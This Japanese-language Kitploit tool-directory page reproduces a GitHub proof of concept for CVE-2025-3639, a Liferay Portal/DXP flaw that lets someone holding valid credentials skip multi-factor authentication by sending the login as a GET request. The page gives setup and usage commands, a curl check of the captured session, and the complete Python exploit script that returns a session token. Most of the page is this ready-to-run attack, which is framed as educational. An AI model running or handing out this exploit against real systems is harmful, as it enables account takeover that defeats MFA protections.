Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-3639 — Liferay Portal(バージョン7.3.0~7.4.3.132)およびLiferay DXP(2024.Q1~2025.Q1.6の各種バージョン)におけるログインバイパスの脆弱性 | Kitploit
ツール/GitHubGitHub/6lj/cve-2025-3639
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHub6lj/cve-2025-3639

CVE-2025-3639

Liferay Portal(バージョン7.3.0~7.4.3.132)およびLiferay DXP(2024.Q1~2025.Q1.6の各種バージョン)におけるログインバイパスの脆弱性

リポジトリを見る
2411ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-3639 PoC - Liferay Portal/DXP ログインバイパス

このリポジトリには、CVE-2025-3639 の Proof of Concept (PoC) が含まれています。これは、Liferay Portal(バージョン 7.3.0 ~ 7.4.3.132)および Liferay DXP(2024.Q1 から 2025.Q1.6 までの複数バージョン)におけるログインバイパス脆弱性です。この PoC は、有効な認証情報を持つ未認証ユーザーが、POST リクエストを GET リクエストに変更することで多要素認証 (MFA) をバイパスし、ユーザーアカウントに不正アクセスする可能性があることを示しています。

警告: この PoC は教育目的のみです。この脆弱性の無許可でのテストや悪用は違法であり、非倫理的です。システム所有者から明示的な書面による許可を得た場合のみ使用してください。

必要条件

  • 環境: Linux(例: Kali Linux、Ubuntu、または仮想化環境)。
  • 依存関係:
    root@kitploit:~
    sudo apt-get update
    sudo apt-get install python3 python3-requests
    pip3 install requests
    
  • ネットワーク: 対象の Liferay Portal/DXP インスタンスへのアクセス(明示的な許可を得たテスト環境であること)。
  • 認証情報: 対象の Liferay インスタンスの有効なユーザー認証情報。

インストール

  1. リポジトリをクローンします:

    root@kitploit:~
    git clone https://github.com/6lj/CVE-2025-3639.git
    cd CVE-2025-3639
    
  2. Python 3 と requests ライブラリがインストールされていることを確認します:

    root@kitploit:~
    pip3 install requests
    

機能

  • この PoC は、ログイン POST リクエストを GET リクエストに変更することで CVE-2025-3639 を悪用し、MFA チェックをバイパスします。
  • 有効な認証情報を含む細工された HTTP GET リクエストを送信し、MFA プロセスを完了せずに認証します。
  • このスクリプトは、管理された許可された環境で脆弱性を実証するように設計されています。

使用方法

適切な引数(<target_url>、<username>、<password> を対象の Liferay インスタンス URL と有効な認証情報に置き換えてください)を指定して PoC スクリプトを実行します。

poc.py

root@kitploit:~
python3 poc.py --target <target_url> --username <username> --password <password>
  • パラメータ:
    • --target: Liferay Portal/DXP インスタンスの URL(例: http://example.com)。
    • --username: 対象インスタンスの有効なユーザー名。
    • --password: そのユーザー名の有効なパスワード。

例

root@kitploit:~
python3 poc.py --target http://192.168.1.100 --username [email protected] --password Test123!

結果の確認

  • 成功: エクスプロイトが機能した場合、スクリプトは有効なセッショントークンまたは MFA なしでユーザーアカウントへのアクセスを示す成功メッセージを返します。

    root@kitploit:~
    curl -b "COOKIE=<session_token>" http://<target_url>/api/jsonws/user/get-current-user
    
    • 期待される出力: 認証成功を確認するユーザー詳細。
  • 失敗: サーバーがエラー(例: 401 Unauthorized または 403 Forbidden)を返した場合、インスタンスが脆弱でないか、MFA が有効になっていない可能性があります。

  • トラフィックの監視: Wireshark などのツールを使用して HTTP トラフィックを検査します:

    root@kitploit:~
    sudo wireshark -f "tcp port 80 or tcp port 443"
    

PoC スクリプト

以下は poc.py のサンプルコードです:

root@kitploit:~
import requests
import argparse

def exploit(target, username, password):
    print(f"[*] Attempting CVE-2025-3639 exploit on {target}")
    login_url = f"{target}/c/portal/login"

    params = {
        "p_auth": "",
        "login": username,
        "password": password
    }
    
    try:
        response = requests.get(login_url, params=params, allow_redirects=True)
        if response.status_code == 200 and "JSESSIONID" in response.cookies:
            print(f"[+] Success! Session token: {response.cookies['JSESSIONID']}")
            return True
        else:
            print(f"[-] Failed: {response.status_code} - {response.text}")
            return False
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-3639 PoC for Liferay Portal/DXP")
    parser.add_argument("--target", required=True, help="Target Liferay URL (e.g., http://example.com)")
    parser.add_argument("--username", required=True, help="Valid username")
    parser.add_argument("--password", required=True, help="Valid password")
    args = parser.parse_args()
    
    exploit(args.target, args.username, args.password)

重要な注意事項

  • この PoC は有効な認証情報を必要とします。脆弱性は MFA のバイパスを可能にしますが、認証情報の推測はできません。
  • システム所有者から明示的な許可を得た管理された環境でのみテストしてください。
  • この脆弱性は新しいバージョンの Liferay Portal/DXP で修正されています。最新バージョンに更新してこの問題を軽減してください。
  • Liferay セキュリティアドバイザリ
  • NVD CVE-2025-3639
  • GitHub リポジトリ

免責事項

このプロジェクトは教育目的のみです。著者は、この PoC の無許可または違法な使用について一切の責任を負いません。テスト前に必ずシステム所有者から明示的な許可を得てください。

ツールをダウンロード